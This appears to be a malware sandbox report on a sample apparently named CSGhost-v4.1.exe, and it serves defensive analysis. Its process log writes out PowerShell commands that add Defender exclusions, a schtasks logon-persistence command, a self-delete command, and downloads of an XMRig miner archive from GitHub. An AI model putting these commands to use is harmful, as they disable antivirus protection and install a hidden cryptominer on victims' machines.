        Scheduled Task/Job: Scheduled Task
        
        PID:2916
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        12⤵
        
        PID:2196
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        13⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:2148
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        10⤵
        
        PID:2312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        10⤵
        Loads dropped DLL
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        12⤵
        
        PID:2864
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        12⤵
        
        PID:2432
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        13⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:1632
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        10⤵
        
        PID:1988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        10⤵
        Loads dropped DLL
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        12⤵
        
        PID:2816
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        12⤵
        
        PID:2464
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        13⤵
        
        PID:2768
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        8⤵
        
        PID:2660
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:2640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1088
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2904

Network

DNS

sanctam.net

svchost64.exe

Remote address:

8.8.8.8:53

Request

sanctam.net

IN A

Response
DNS

github.com

svchost64.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

svchost64.exe

Remote address:

20.26.156.215:443

Request

GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 09 Nov 2024 16:29:32 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C08B:2A730B:10281:123BD:672F8DEA
DNS

raw.githubusercontent.com

svchost64.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

svchost64.exe

Remote address:

20.26.156.215:443

Request

GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 09 Nov 2024 16:29:32 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C11B:2AB05F:1069D:129C4:672F8E0C
GET

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

svchost64.exe

Remote address:

20.26.156.215:443

Request

GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 09 Nov 2024 16:29:32 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C176:2B15D8:12329:1487A:672F8E34
GET

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

svchost64.exe

Remote address:

20.26.156.215:443

Request

GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 09 Nov 2024 16:29:32 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C1C9:2AD944:13984:1611E:672F8E5C

20.26.156.215:443

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

tls, http

svchost64.exe

1.0kB
7.9kB
13
10

HTTP Request

GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

HTTP Response

302
185.199.109.133:443

raw.githubusercontent.com

tls

svchost64.exe

741 B
4.1kB
9
10
20.26.156.215:443

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

tls, http

svchost64.exe

837 B
7.8kB
9
8

HTTP Request

GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

HTTP Response

302
185.199.109.133:443

raw.githubusercontent.com

tls

svchost64.exe

793 B
4.2kB
10
11
20.26.156.215:443

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

tls, http

svchost64.exe

841 B
7.8kB
9
8

HTTP Request

GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

HTTP Response

302
185.199.109.133:443

raw.githubusercontent.com

tls

svchost64.exe

691 B
4.1kB
8
10
20.26.156.215:443

https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

tls, http

svchost64.exe

841 B
7.8kB
9
8

HTTP Request

GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

HTTP Response

302
185.199.109.133:443

raw.githubusercontent.com

tls

svchost64.exe

695 B
4.1kB
8
10

8.8.8.8:53

sanctam.net

dns

svchost64.exe

57 B
130 B
1
1

DNS Request

sanctam.net
8.8.8.8:53

github.com

dns

svchost64.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

raw.githubusercontent.com

dns

svchost64.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.110.133

185.199.108.133

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
929a2212220e9b880c5e949576014004

SHA1
dc936f254917a52bda0ee7bfec4c9c61628504b8

SHA256
0a7c8aeea55c9f23a296e9be56ad3063f945a456788680d4e15af58831cb4a59

SHA512
d693de9ee33cbdf87e42620536497ca64be7eebb7d621deb74daeafef23c5a7cc683cbc22b00e6fd7f84a174e7e887f5c1b35bac56b2fb33ae7c77e9543cf501

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
88f0d219c19c0f974b513dff80e88bbe

SHA1
1e6ccf25389c37e5fef8cc2319ce466b9d09b465

SHA256
e3e0e3d9bb8c72e28d1bc4d2820be7aae7647cb3820a76c8fdd1d45614096155

SHA512
26b730fddaceb4a317f68cbe387331bab03e7e3e10786e8cad0983a512d9159c5610c14e72f83135451a4b4f9d5fc1cb5362b09d552a6fedddb37b3f0931732c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCEB6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCEB9.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Filesize
39KB

MD5
a5bdb33481f19152370a4cbe486c1790

SHA1
d657448275485590e0b141bc3965f03650636e47

SHA256
ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075

SHA512
61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
0dc0c432c76b5f23dec8f2da05da574f

SHA1
f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0

SHA256
9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee

SHA512
5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fe7691d2ecc05d98b3d4431abdc103c9

SHA1
96d666b1984784b067cfec45c066fdfb44f15409

SHA256
733a2010bc40d1bd02beb0480a22f5ece50583388780d8ae9ff404d417f34562

SHA512
4fcce183c510af40b5a75f55e7fdaeeeed0f00d95494329c33d6dd07f45acdedce1f51fdbd03b2054f87341d1221884dfe363239a3144613d8d1257848d3198e

Download Submit
\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

Filesize
99KB

MD5
56a7502c31f7e8b9df6026cca035d000

SHA1
a2e1dea33bec675650559a148f78f831a0c11886

SHA256
b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f

SHA512
82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

Download Submit
